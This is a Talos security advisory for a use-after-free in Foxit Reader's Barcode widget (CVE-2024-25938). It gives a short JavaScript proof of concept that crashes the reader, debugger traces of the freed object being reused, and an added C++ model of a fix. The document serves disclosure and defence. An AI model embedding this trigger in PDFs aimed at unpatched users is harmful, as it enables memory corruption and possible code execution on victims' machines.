Talos Vulnerability Report

TALOS-2024-1958

Foxit Reader Barcode widget Calculate event use-after-free vulnerability

April 30, 2024
CVE Number

CVE-2024-25938

SUMMARY

A use-after-free vulnerability exists in the way Foxit Reader 2024.1.0.23997 handles a Barcode widget. A specially crafted JavaScript code inside a malicious PDF document can trigger reuse of a previously freed object, which can lead to memory corruption and result in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially crafted, malicious site if the browser plugin extension is enabled.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Foxit Reader 2024.1.0.23997

PRODUCT URLS

Foxit Reader - https://www.foxitsoftware.com/pdf-reader/

CVSSv3 SCORE

8.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE

CWE-416 - Use After Free

DETAILS

Foxit PDF Reader is one of the most popular PDF document readers. It aims for feature parity with Adobe’s Acrobat Reader. As a complete and feature-rich PDF reader, it supports JavaScript for interactive documents and dynamic forms. JavaScript support poses an additional attack surface. Foxit Reader uses the V8 JavaScript engine.

Javascript support in PDF renderers and editors enables dynamic documents that can change based on user input or events. There exists a use-after-free vulnerability in the way Foxit Reader handles a Barcode object. This can be illustrated by the following proof-of-concept code:

function main() {
    // Attach a Calculate action to the Barcode field; the action body is the
    // delete_pages() function defined below.
    getField('Barcode Field0').setAction("Calculate", 'delete_pages();');

    // Operating on the field fires the Calculate action while the widget is
    // still in use by the caller.
    app.activeDocs[0].getField('Barcode Field0').buttonSetIcon();
}

function delete_pages() {
    // Deleting the pages frees every object owned by them, the Barcode widget included.
    app.activeDocs[0].deletePages();
    app.activeDocs[0].deletePages();
}

The above code simply assigns a callback to the Calculate action of the field Barcode Field0, which is promptly triggered by the second call to getField. In the action callback, all that happens is a call to deletePages, which in turn ends up freeing all the objects associated with a page. The use-after-free vulnerability occurs when a Barcode object is freed by deletePages() and is used afterwards without any validation. We can observe the following in the debugger (with PageHeap enabled):

0:000> g
eax=072fe130 ebx=072fe19c ecx=029940a0 edx=00000002 esi=12f4cb88 edi=12f4cb48
eip=02cd56e9 esp=072fe108 ebp=072fe148 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200206
FoxitPDFReader!FXJSE_GetClass+0x269:
02cd56e9 ffd1            call    ecx {FoxitPDFReader!safe_vsnprintf+0x11f9270 (029940a0)} 
0:000> g
eax=00d7f9a0 ebx=072fe19c ecx=12f53500 edx=046b9308 esi=12f4cb88 edi=12f4cb48
eip=029bbb4d esp=072fdea4 ebp=072fdf4c iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200206
FoxitPDFReader!safe_vsnprintf+0x1220d1d:
029bbb4d ffd0            call    eax {FoxitPDFReader!CryptUIWizExport+0x36b20 (00d7f9a0)}
0:000> g
in   javascript::Field::UpdateFormField
eax=00d7f9a0 ebx=072fe19c ecx=12f53500 edx=046b9308 esi=12f4cb88 edi=12f4cb48
eip=029bbb4d esp=072fdea4 ebp=072fdf4c iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200206
FoxitPDFReader!safe_vsnprintf+0x1220d1d:
029bbb4d ffd0            call    eax {FoxitPDFReader!CryptUIWizExport+0x36b20 (00d7f9a0)}
0:000> g
eax=072fd698 ebx=072fd704 ecx=02904f80 edx=00000002 esi=1029b318 edi=12ff2a58
eip=02cd56e9 esp=072fd670 ebp=072fd6b0 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200206
FoxitPDFReader!FXJSE_GetClass+0x269:
02cd56e9 ffd1            call    ecx {FoxitPDFReader!safe_vsnprintf+0x116a150 (02904f80)} ; <------ (1)
0:000> g
ModLoad: 695d0000 69927000   C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\plugins\PDFAccessibility.fpi
eax=072fd698 ebx=072fd704 ecx=02904f80 edx=00000002 esi=10b39840 edi=10b39800
eip=02cd56e9 esp=072fd670 ebp=072fd6b0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!FXJSE_GetClass+0x269:
02cd56e9 ffd1            call    ecx {FoxitPDFReader!safe_vsnprintf+0x116a150 (02904f80)} ; <------ (2)
0:000> g
eax=072fafa8 ebx=132feb6c ecx=132fe9b0 edx=07111000 esi=132feb68 edi=12fdb7b0
eip=005aad36 esp=072fafcc ebp=072fd3f4 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xeb886:
005aad36 8b01            mov     eax,dword ptr [ecx]  ds:002b:132fe9b0=0472e794
0:000> dd ecx                                                                 ;<--------------- (3)
132fe9b0  0472e794 132fea50 186d2520 12d6c488
132fe9c0  e0e0e000 00000001 10b9c9e8 01000101
132fe9d0  00000004 00000000 132fea90 00000000
132fe9e0  10b9c944 135b0a40 0f5fd160 00000001
132fe9f0  00000000 00000000 00000000 00000000
132fea00  00000000 e0e0e001 00000000 12f53500
132fea10  00000000 a0a0a0a0 a0a0a0a0 f0f0f0f0
132fea20  00000000 00000000 86981040 10770152
0:000> p
eax=0472e794 ebx=132feb6c ecx=132fe9b0 edx=07111000 esi=132feb68 edi=12fdb7b0
eip=005aad38 esp=072fafcc ebp=072fd3f4 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xeb888:
005aad38 6a01            push    1
0:000> p
eax=0472e794 ebx=132feb6c ecx=132fe9b0 edx=07111000 esi=132feb68 edi=12fdb7b0
eip=005aad3a esp=072fafc8 ebp=072fd3f4 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xeb88a:
005aad3a ff5004          call    dword ptr [eax+4]    ds:002b:0472e798=0174e360 ; <------ (4)
0:000> p
eax=132fe9b0 ebx=132feb6c ecx=132fe9b0 edx=00000001 esi=132feb68 edi=12fdb7b0
eip=005aad3d esp=072fafcc ebp=072fd3f4 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xeb88d:
005aad3d 83c604          add     esi,4                      
0:000> dd ecx                                                                  ; <------ (5)     
132fe9b0  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
132fe9c0  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
132fe9d0  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
132fe9e0  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
132fe9f0  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
132fea00  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
132fea10  f0f0f0f0 a0a0a0a0 a0a0a0a0 f0f0f0f0
132fea20  00000000 00000000 86981040 10770152

At [1] and [2] above, the javascript::CFXJS_Document::deletePages_static method associated with the JavaScript API deletePages() is called. The second call to the deletePages_static() method calls the destructor of the CBF_Widget class at [4]. This destructor call frees the vulnerable CBF_Widget object. The memory of the vulnerable CBF_Widget object is dumped at [3] and [5], showing its contents before and after the destructor is called; the f0f0f0f0 fill pattern at [5] is PageHeap's marker for freed memory. The vulnerable CBF_Widget object is a type of Barcode object, which is later used without any validation. This can be observed in a debugger at the time of the crash:

0:000> g
eax=ffffffff ebx=132fe9b0 ecx=3d29bcf1 edx=07111000 esi=135b0a40 edi=0472e16c
eip=0174914c esp=072fde24 ebp=072fde80 iopl=0         nv up ei pl zr na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200247
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4ffe9c:
0174914c c20800          ret     8
0:000> t
eax=ffffffff ebx=132fe9b0 ecx=3d29bcf1 edx=07111000 esi=135b0a40 edi=0472e16c
eip=01758f54 esp=072fde30 ebp=072fde80 iopl=0         nv up ei pl zr na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200247
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x50fca4:
01758f54 8b7334          mov     esi,dword ptr [ebx+34h] ds:002b:132fe9e4=f0f0f0f0
0:000> p
eax=ffffffff ebx=132fe9b0 ecx=3d29bcf1 edx=07111000 esi=f0f0f0f0 edi=0472e16c
eip=01758f57 esp=072fde30 ebp=072fde80 iopl=0         nv up ei pl zr na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200247
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x50fca7:
01758f57 8d4350          lea     eax,[ebx+50h]
0:000> p
eax=132fea00 ebx=132fe9b0 ecx=3d29bcf1 edx=07111000 esi=f0f0f0f0 edi=0472e16c
eip=01758f5a esp=072fde30 ebp=072fde80 iopl=0         nv up ei pl zr na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200247
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x50fcaa:
01758f5a 50              push    eax
0:000> p
eax=132fea00 ebx=132fe9b0 ecx=3d29bcf1 edx=07111000 esi=f0f0f0f0 edi=0472e16c
eip=01758f5b esp=072fde2c ebp=072fde80 iopl=0         nv up ei pl zr na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200247
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x50fcab:
01758f5b ff7510          push    dword ptr [ebp+10h]  ss:002b:072fde90=00000001
0:000> p
eax=132fea00 ebx=132fe9b0 ecx=3d29bcf1 edx=07111000 esi=f0f0f0f0 edi=0472e16c
eip=01758f5e esp=072fde28 ebp=072fde80 iopl=0         nv up ei pl zr na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200247
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x50fcae:
01758f5e 8bcb            mov     ecx,ebx
0:000> p
eax=132fea00 ebx=132fe9b0 ecx=132fe9b0 edx=07111000 esi=f0f0f0f0 edi=0472e16c
eip=01758f60 esp=072fde28 ebp=072fde80 iopl=0         nv up ei pl zr na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200247
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x50fcb0:
01758f60 c70000000000    mov     dword ptr [eax],0    ds:002b:132fea00=f0f0f0f0
0:000> p
eax=132fea00 ebx=132fe9b0 ecx=132fe9b0 edx=07111000 esi=f0f0f0f0 edi=0472e16c
eip=01758f66 esp=072fde28 ebp=072fde80 iopl=0         nv up ei pl zr na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200247
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x50fcb6:
01758f66 ff75e8          push    dword ptr [ebp-18h]  ss:002b:072fde68=186ce020
0:000> p
eax=132fea00 ebx=132fe9b0 ecx=132fe9b0 edx=07111000 esi=f0f0f0f0 edi=0472e16c
eip=01758f69 esp=072fde24 ebp=072fde80 iopl=0         nv up ei pl zr na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200247
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x50fcb9:
01758f69 e8920546ff      call    FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2cddf0 (00bb9500) <----- (6)
0:000> t
eax=132fea00 ebx=132fe9b0 ecx=132fe9b0 edx=07111000 esi=f0f0f0f0 edi=0472e16c
eip=00bb9500 esp=072fde20 ebp=072fde80 iopl=0         nv up ei pl zr na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200247
FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2cddf0:
00bb9500 8b410c          mov     eax,dword ptr [ecx+0Ch] ds:002b:132fe9bc=f0f0f0f0 ; <--------------- (7)
0:000> p
eax=f0f0f0f0 ebx=132fe9b0 ecx=132fe9b0 edx=07111000 esi=f0f0f0f0 edi=0472e16c
eip=00bb9503 esp=072fde20 ebp=072fde80 iopl=0         nv up ei pl zr na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200247
FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2cddf3:
00bb9503 85c0            test    eax,eax
0:000> p
eax=f0f0f0f0 ebx=132fe9b0 ecx=132fe9b0 edx=07111000 esi=f0f0f0f0 edi=0472e16c
eip=00bb9505 esp=072fde20 ebp=072fde80 iopl=0         nv up ei ng nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200286
FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2cddf5:
00bb9505 7403            je      FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2cddfa (00bb950a) [br=0]
0:000> p
eax=f0f0f0f0 ebx=132fe9b0 ecx=132fe9b0 edx=07111000 esi=f0f0f0f0 edi=0472e16c
eip=00bb9507 esp=072fde20 ebp=072fde80 iopl=0         nv up ei ng nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200286
FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2cddf7:
00bb9507 8b00            mov     eax,dword ptr [eax]  ds:002b:f0f0f0f0=???????? ; <--------------- (8)
0:000> p
(167c.41c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=f0f0f0f0 ebx=132fe9b0 ecx=132fe9b0 edx=07111000 esi=f0f0f0f0 edi=0472e16c
eip=00bb9507 esp=072fde20 ebp=072fde80 iopl=0         nv up ei ng nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210286
FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2cddf7:
00bb9507 8b00            mov     eax,dword ptr [eax]  ds:002b:f0f0f0f0=????????

0:000> u
FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2cddf7:
00bb9507 8b00            mov     eax,dword ptr [eax]
00bb9509 c3              ret
00bb950a 33c0            xor     eax,eax
00bb950c c3              ret
00bb950d cc              int     3
00bb950e cc              int     3
00bb950f cc              int     3
00bb9510 51              push    ecx


0:000> kb
 # ChildEBP RetAddr      Args to Child              
WARNING: Stack unwind information not available. Following frames may be wrong.
00 072fde80 01758785     00000000 00000000 00000001 FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2cddf7
01 072fde9c 029bbb4f     00000000 00000000 00000001 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x50f4d5
02 072fdf4c 029c3b3c     13055370 186ce110 00000000 FoxitPDFReader!safe_vsnprintf+0x1220d1f
03 072fe060 02994349     12f4cb48 072fe128 072fe0a8 FoxitPDFReader!safe_vsnprintf+0x1228d0c
04 072fe100 02cd56eb     12f4cb48 072fe130 072fe128 FoxitPDFReader!safe_vsnprintf+0x11f9519
05 072fe148 02eb9a6b     131bed70 18dad269 131bed70 FoxitPDFReader!FXJSE_GetClass+0x26b
06 072fe1b0 02eb922e     072fe1f8 18dad269 072fe2d4 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e3cab
07 072fe244 02eb94e5     072fe274 131bed70 072fe2d4 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e346e
08 072fe28c 02eb936b     072fe2a4 00000007 072fe2e8 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e3725
09 072fe2a8 030db17b     00000007 072fe2e8 131bed70 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e35ab
0a 072fe2c8 030771d9     00082339 18dadb6d 0000000e FoxitPDFReader!CFXJSE_Arguments::GetValue+0x4053bb
0b 072fe310 030771d9     18dbeb6d 18f51dc9 18f51e1d FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3a1419
0c 072fe33c 03075860     18dbeb6d 000821b1 18f51dc9 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3a1419
0d 072fe354 03075689     00000000 00000000 00000002 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x39faa0
0e 072fe380 02d11f4e     131bed70 00082339 18f51dc9 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x39f8c9
0f 072fe490 02d11a42     072fe624 131bed70 072fe4ec FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3c18e
10 072fe518 02cfa744     072fe624 131bed70 15a824c4 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3bc82
11 072fe6c8 02cfa240     072fe764 15a824ec 00000000 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x24984
12 072fe6dc 02cd3c5f     072fe764 15a824ec 3d298585 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x24480
13 072fe754 02cd4596     15a824c4 15a823d0 15a824b0 FoxitPDFReader!FXJSE_Runtime_Release+0xeaf
14 072fe790 02878af7     15826350 186b928c 15a823d0 FoxitPDFReader!FXJSE_ExecuteScript+0x86
15 072fe848 0287a129     00000000 072fe8d8 072fe880 FoxitPDFReader!safe_vsnprintf+0x10ddcc7
16 072fe860 00bb20df     072fe8d8 072fe880 3d298a41 FoxitPDFReader!safe_vsnprintf+0x10df2f9
17 072fe890 00bb0fa4     15825e28 00000015 072fe8b8 FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2c69cf
18 072fe8d0 00baf9d0     186da020 1315e280 10bf3bc8 FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2c5894
19 072fe924 0049d322     072fe954 1315e280 10bf3bc8 FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2c42c0
1a 072fe974 0071901b     00000000 3d299749 7fffffff FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x8852
1b 072ff598 03cb9713     00000000 00000000 3d2994b9 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x6194b
1c 072ff668 03cba8ec     00000429 00000000 00000000 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x199cc3
1d 072ff68c 03cb5292     00000429 00000000 00000000 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x19ae9c
1e 072ff700 03cb5b05     13076098 000d02c2 00000429 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x195842
1f 072ff720 750c120b     000d02c2 00000429 00000000 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x1960b5
20 072ff74c 750b81ca     03cb5ad1 000d02c2 00000429 USER32!AddClipboardFormatListener+0x4b
21 072ff830 750b5f2a     03cb5ad1 00000000 00000429 USER32!GetClassLongW+0x7ba
22 072ff8a4 750b5cf0     00000329 072ff8cc 0069f324 USER32!DispatchMessageW+0x24a
23 072ff8b0 0069f324     0c3c8fe8 0c3c8fe8 057d98e8 USER32!DispatchMessageW+0x10
24 072ff8cc 0069f3e3     057d98e8 0069f350 ffffffff FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0x1dfe74
25 072ff8ec 040e29c2     00000000 0580550c 0710e000 FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0x1dff33
26 072ff904 03e9cef1     00250000 00000000 0c3653c4 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x5c2f72
27 072ff950 76ddfcc9     0710e000 76ddfcb0 072ff9bc FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x37d4a1
28 072ff960 77247c6e     0710e000 8017ce93 00000000 KERNEL32!BaseThreadInitThunk+0x19
29 072ff9bc 77247c3e     ffffffff 77268c33 00000000 ntdll!RtlGetAppContainerNamedObjectPath+0x11e
2a 072ff9cc 00000000     03e9cfc0 0710e000 00000000 ntdll!RtlGetAppContainerNamedObjectPath+0xee

At [6] above, the vulnerable CBF_Widget object calls the CBA_Annot::GetPage method. In CBA_Annot::GetPage(), the already freed CBF_Widget object is dereferenced at [7]. This directly leads to a use-after-free condition and results in a crash. Depending on the memory layout of the process, it may be possible to achieve arbitrary read and write access, which could ultimately be abused to achieve arbitrary code execution.
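The two debugger walkthroughs above describe one ownership problem: a script-controlled event (Calculate) fires in the middle of a method running on a widget, the event handler deletes the pages that own that widget, and the method then keeps using the widget. The following C++ model, added here as an illustration and not code from the advisory or from Foxit, reproduces that control flow and applies the validation the advisory says is missing. The names Document, Page, Widget, getField, deletePages and buttonSetIcon loosely mirror the PDF JavaScript API; the use of std::shared_ptr/std::weak_ptr, the single-page sample document and the return values are assumptions made for the example.

```cpp
// Added example (not Foxit's code): simplified model of a widget method that
// fires a script event which may delete the widget's owning page.
#include <functional>
#include <memory>
#include <string>
#include <vector>

struct Widget;

struct Page {
    std::vector<std::shared_ptr<Widget>> widgets;   // page owns its widgets
};

struct Widget {
    std::string name;
    std::weak_ptr<Page> page;          // non-owning back-reference to the page
    std::function<void()> calculate;   // "Calculate" action, script-controlled
};

struct Document {
    std::vector<std::shared_ptr<Page>> pages;

    // Equivalent of deletePages(): drops every page together with its widgets.
    void deletePages() { pages.clear(); }

    std::shared_ptr<Widget> getField(const std::string& name) {
        for (auto& p : pages)
            for (auto& w : p->widgets)
                if (w->name == name) return w;
        return nullptr;
    }

    // Hardened buttonSetIcon: fires the Calculate action first (as the reader
    // does), then re-validates that the widget still has a live page before
    // touching page data. The vulnerable flow held a raw Widget* and went
    // straight to the page lookup after the callback, which is the dereference
    // of freed memory at [7] in the advisory once deletePages() had run.
    bool buttonSetIcon(const std::shared_ptr<Widget>& widget) {
        if (!widget) return false;
        // Holding a shared_ptr keeps *widget alive across the callback even if
        // the callback removes it from the document.
        if (widget->calculate) widget->calculate();
        // Liveness check: if the page was deleted during the event,
        // weak_ptr::lock() yields nullptr and we refuse instead of crashing.
        std::shared_ptr<Page> page = widget->page.lock();
        if (!page) return false;
        return true;   // page is still owned by the document: safe to continue
    }
};

// Builds a one-page document with a single widget named as in the PoC
// (constructed sample data, not taken from the advisory).
std::shared_ptr<Document> makeDocument() {
    auto doc = std::make_shared<Document>();
    auto page = std::make_shared<Page>();
    auto widget = std::make_shared<Widget>();
    widget->name = "Barcode Field0";
    widget->page = page;
    page->widgets.push_back(widget);
    doc->pages.push_back(page);
    return doc;
}

// Replays the PoC's control flow against the hardened model: the Calculate
// action deletes all pages while buttonSetIcon is still executing. Returns
// true when the re-entrant deletion is survived with no dangling use.
bool runScenario() {
    auto doc = makeDocument();
    Document* raw = doc.get();   // doc outlives the callback in this function
    doc->getField("Barcode Field0")->calculate = [raw]() {
        raw->deletePages();
        raw->deletePages();      // second call is a no-op on an empty document
    };
    bool iconSet = doc->buttonSetIcon(doc->getField("Barcode Field0"));
    // The event freed the page, so the icon update was refused and the field
    // is no longer reachable through the document.
    return !iconSet && doc->pages.empty() &&
           doc->getField("Barcode Field0") == nullptr;
}

int main() { return runScenario() ? 0 : 1; }
```

The fix shown is the pair of properties the crash trace says are absent: the receiver stays alive for the duration of the script callback, and the page back-reference is re-validated after the callback rather than trusted. An equally valid design is to defer page deletion requested from inside an event handler until the handler returns; either way, no raw pointer to page-owned data may survive a call into script.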

VENDOR RESPONSE

The vendor has provided updated versions.

TIMELINE

2024-04-01 - Vendor Disclosure
2024-04-28 - Vendor Patch Release
2024-04-30 - Public Release

Credit

Discovered by KPC of Cisco Talos.